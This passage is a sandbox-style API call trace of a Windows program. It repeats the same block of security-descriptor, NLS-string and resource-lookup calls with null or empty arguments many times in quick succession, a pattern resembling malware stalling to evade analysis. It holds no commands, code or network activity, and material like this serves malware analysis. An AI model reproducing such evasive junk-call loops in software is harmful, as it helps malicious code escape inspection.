ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.949] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.949] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.949] FreeResource (hResData=0x0) returned 0 [0219.949] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.949] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.950] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.950] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.950] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.950] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.950] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.950] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.950] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.950] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.950] LockResource (hResData=0x0) returned 0x0 [0219.950] FreeResource (hResData=0x0) returned 0 [0219.950] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.950] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.951] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.951] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.951] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.951] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.951] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.951] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.951] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.951] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.951] LockResource (hResData=0x0) returned 0x0 [0219.951] FreeResource (hResData=0x0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.952] FreeResource (hResData=0x0) returned 0 [0219.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.952] FreeResource (hResData=0x0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.952] FreeResource (hResData=0x0) returned 0 [0219.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.952] FreeResource (hResData=0x0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.952] FreeResource (hResData=0x0) returned 0 [0219.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.952] FreeResource (hResData=0x0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.952] FreeResource (hResData=0x0) returned 0 [0219.952] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.952] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.952] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.952] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.952] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.952] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.953] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.953] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.953] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.953] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.953] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.953] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.953] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.953] LockResource (hResData=0x0) returned 0x0 [0219.953] FreeResource (hResData=0x0) returned 0 [0219.953] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.953] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.953] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.953] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.954] FreeResource (hResData=0x0) returned 0 [0219.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.954] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.955] LockResource (hResData=0x0) returned 0x0 [0219.955] FreeResource (hResData=0x0) returned 0 [0219.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.956] LockResource (hResData=0x0) returned 0x0 [0219.956] FreeResource (hResData=0x0) returned 0 [0219.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, 